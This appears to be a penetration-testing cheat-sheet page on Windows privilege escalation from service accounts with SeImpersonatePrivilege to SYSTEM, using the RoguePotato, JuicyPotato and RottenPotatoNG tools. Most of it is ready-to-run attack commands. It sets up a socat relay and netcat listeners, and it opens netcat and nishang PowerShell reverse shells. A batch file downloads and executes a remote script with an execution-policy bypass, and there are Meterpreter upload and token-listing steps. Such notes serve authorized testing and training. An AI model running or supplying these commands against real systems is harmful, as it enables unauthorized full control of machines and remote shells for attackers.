Comment on page
Juicy Potato, Rotten Potato (NG)
SeImpersonatePrivilege
(show privs via
whoami /priv)Another Windows Local Privilege Escalation from Service Account to System https://github.com/antonioCoco/RoguePotato
Setup relay (can run e.g. on attacking machine)
socat tcp-listen:135,reuseaddr,fork tcp:<target-ip>:9999
Set up listener
nc -nlvp 1337
Run exploit
RoguePotato.exe -r <relay-ip> -e "nc.exe <local-ip> 1337 -e cmd.exe" -l 9999
A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. Releases · ohpe/juicy-potato · GitHub -> https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
⚠️ ** Microsoft patched this Vulnerability in Windows Versions 1809/Build 17763** ⚠️
(works until 1803 / 17134)
Example
Using nishang reverse shell
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
-> append
Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to the end of the file to automatically execute the shellCreate and upload helper bat file to execute powershell stuff
shell.bat
cmd /c powershell.exe -ExecutionPolicy Bypass -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')
Start listener
nc -nlvp <port>
Execute
.\JuicyPotato.exe -t * -p C:\Users\<user>\Documents\shell.bat -l 1234
-> Currently unsure why
l is needed⚠️ Troubleshooting ⚠️
If not working (e.g. error 10038) try another
clsid from-c '{<cls-id>}'
New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.
In msf meterpreter (multi/handler)
upload /path/to/rottenpotato.exe
execute -cH -f rottenpotato.exe
``` load incognito list_tokens -u ```
Last modified 1yr ago